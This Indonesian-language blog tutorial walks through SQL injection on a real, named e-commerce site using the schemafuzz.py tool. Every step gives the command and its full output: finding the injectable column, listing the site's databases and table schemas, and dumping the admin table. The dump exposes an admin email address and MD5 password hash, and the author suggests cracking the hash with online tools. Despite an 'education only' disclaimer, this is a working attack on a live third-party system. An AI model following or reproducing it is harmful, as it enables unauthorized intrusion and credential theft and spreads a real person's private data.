Tutorial hacking SQL injection dengan schemafuzz

Nulis tentang sql injection with schemafuzz.py buat dokumentasi. Schemafuzz.py merupakan tools yang dibuat mengunakan bahasa python dibuat oleh rsauron@gmail.com. digunakan untuk mempermudah/cara instan dalam melakukan sql injection terhadap suatu situs aku sarankan sih lebih baik belajar manual sql injection juga..supaya kita tau apa dan bagaimana sql injection bekerja cari ilmu nya itu yang lebih penting dari semua nya for education and purpose only

login ke shell kita

lalu download schemafuzz.py dari situs nya langsung di darkc0de.com

 [root@server1 ~]# wget http://darkc0de.com/others/schemafuzz.py

lalu beri perintah executable 

[root@server1 ~]#chmod +x schemafuzz.py

rename biar ga panjang ngetik-ngetik nya ntar 

[root@server1 ~]#mv schemafuzz.py falz.py

melihat help schemafuzz

[root@server1 ~]#./falz.py -h

ada option seperti dibawah ini pada inti nya --schema, --dbs, --dump, --fuzz, --info, --full, --findcol

ada juga -p untuk penggunaan proxy dan -o untuk menyimpan hasil log nya

1.cari target yang mau kita tes di google tercinta

 

2.misal aku mendapatkan target http://en.pasen.it/product_detail.php?id=37

 

3.kita lihat dulu pada kolom berapa target kita vuln melalui option di schemafuzz --findcol

[root@server1 ~]#./falz.py -u http://en.pasen.it/product_detail.php?id=37--findcol

[+] URL: http://en.pasen.it/product_detail.php?id=37--

[+] Evasion Used: "+" "--"

[+] 18:39:15

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,3,4,5,6,7,

[+] Column Length is: 8

[+] Found null column at column #: 1

[+] SQLi URL:http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7--

[+] darkc0de URL: http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7

[-] Done!

 

4.masukan hasil dari schemafuzz darkc0de URL: http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7

[root@server1 ~]#./falz.py –u  http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --info

--info = untuk melihat informasi nama database dan versi mysql yang digunakan

 

[+] URL: http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7--

[+] Evasion Used: "+" "--"

[+] 18:41:06

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

        Database: pasen

        User: cutefact_admin@localhost

        Version: 5.0.32-Debian_7etch6-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t

[!] http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5,6,7+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] 18:41:08

[-] Total URL Requests 3

[-] Done

 

5.kebetulan menggunakan versi 5. mysql nya..kita bisa dump database dan table nya :D sekarang kita liat letak Table dan Columns gunakan perintah Berikut :

[root@server1 ~]#./falz.py -u http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --fuzz

[+] Number of tables names to be fuzzed: 338

[+] Number of column names to be fuzzed: 249

[+] Searching for tables and columns...

[!] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"

[!] Found a column called: user

[!] Found a column called: password

[-] Done searching inside table "mysql.user" for columns!

dan seterus nya.....

 

6.kita cek ada berapa data base di situs itu menggunakan option --dbs

[root@server1 ~]#./falz.py -u http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --dbs

[+] Gathering MySQL Server Configuration...

        Database: pasen

        User: cutefact_admin@localhost

        Version: 5.0.32-Debian_7etch6-log

[+] Showing all databases current user has access too!

[+] Number of Databases: 11

[0] affiliatepro

[1] cutefact_db

[2] dutchpipe

[3] ecard_db

[4] ispcp

[5] magento_db

[6] mysql

[7] onionclub_db

[8] pasen

[9] syscp

[10] zen_pasen

[-] 18:43:49

[-] Total URL Requests 13

[-] Done

Don't forget to check schemafuzzlog.txt

 

8.wow ada 11 database...bakalan lama neh obok-oboknya :D

 

9.lalu kita liat schema 1 per 1 data base yang ada...dengan option --schema -D (nama database yang mo kita lihat) aku ambil contoh nama db nya zen_pasen

[root@server1 ~]#./falz.py -u http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --schema -D zen_pasen -o pasen.txt

nb:-o pasen.txt untuk menyimpan hasil schemafuzz kita pada file dengan nama pasen.txt (biar gampang cari nya ntar)

wuik...liat hasil nya

[+] URL: http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7--

[+] Evasion Used: "+" "--"

[+] 18:46:28

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

        Database: pasen

        User: cutefact_admin@localhost

        Version: 5.0.32-Debian_7etch6-log

[+] Showing Tables & Columns from database "zen_pasen"

[+] Number of Tables: 97

[Database]: zen_pasen

[Table: Columns]

[0]address_book:

address_book_id,customers_id,entry_gender,entry_company,entry_firstname,entry_lastname,entry_street_address,entry_suburb,entry_postcode,entry_city,entry_state,entry_country_id,entry_zone_id,entry_vat,entry_cf

[1]address_format: address_format_id,address_format,address_summary

[2]admin: admin_id,admin_name,admin_email,admin_pass,admin_level

[3]admin_activity_log: log_id,access_date,admin_id,page_accessed,page_parameters,ip_address

[4]authorizenet: id,customer_id,order_id,response_code,response_text,authorization_type,transaction_id,sent,received,time,session_id

[5]banners:

banners_id,banners_title,banners_url,banners_image,banners_group,banners_html_text,expires_impressions,expires_date,date_scheduled,date_added,date_status_change,status,banners_open_new_windows,banners_on_ssl,banners_sort_order

[6]banners_history: banners_history_id,banners_id,banners_shown,banners_clicked,banners_history_date

 

 

11.kita ambil 1 contoh table dan colom aja ya....isi yang laen nya silahkan di ubek-ubek sendiri. liat contoh diatas

[2]admin: admin_id,admin_name,admin_email,admin_pass,admin_level

berarti nama table admin nama colom nya adalah admin_id,admin_name,admin_email,admin_pass,admin_level

kita gunakan format --dump -D (namadatabase nya) -T (nama table yang mo kita dump) -C (nama colom nya)

[root@server1 ~]#./falz.py -u http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --dump -D zen_pasen -T admin –C admin_id,admin_name,admin_email,admin_pass,admin_level

NoDataInColumn:1:zen_admin:christian.brandoni@gmail.com:5623cff30b4ffc5b114ac3abf9573c16:99:0:

[1] No data

[-] 18:55:24

[-] Total URL Requests 3

[-] Done

Don't forget to check pasen.txt

nah lo....nongol tuh email admin nya ma password nya masih di encript..tinggal di crack di situs-situs md5 cracker online :D

NoDataInColumn:1:zen_admin:christian.brandoni@gmail.com:5623cff30b4ffc5b114ac3abf9573c16:99:0:

jangan lupa liat log file yang laen di pasen.txt sapa tau ada yg menarik lagi di log nya kita bisa menggunakan tunnelier atau winscp buat mengambil file di server kita.

dibutuhkan praktek yang lebih sering supaya kita bisa lebih paham menggunakan schemafuzz dan banyak kasus juga..sql menggunakan schemafuzz tidak sesuai dengan hasil yang kita ingin untuk kasus itu..sql injection secara manual tetaplah yang terbaik dan paling ampuh sampe saat ini 

nb:schemafuzz juga bisa berjalan di windows dengan terlebih dahulu menginstal python di windows kita bisa download python di sini http://www.python.org/ftp/python/2.5.2/python-2.5.2.msi.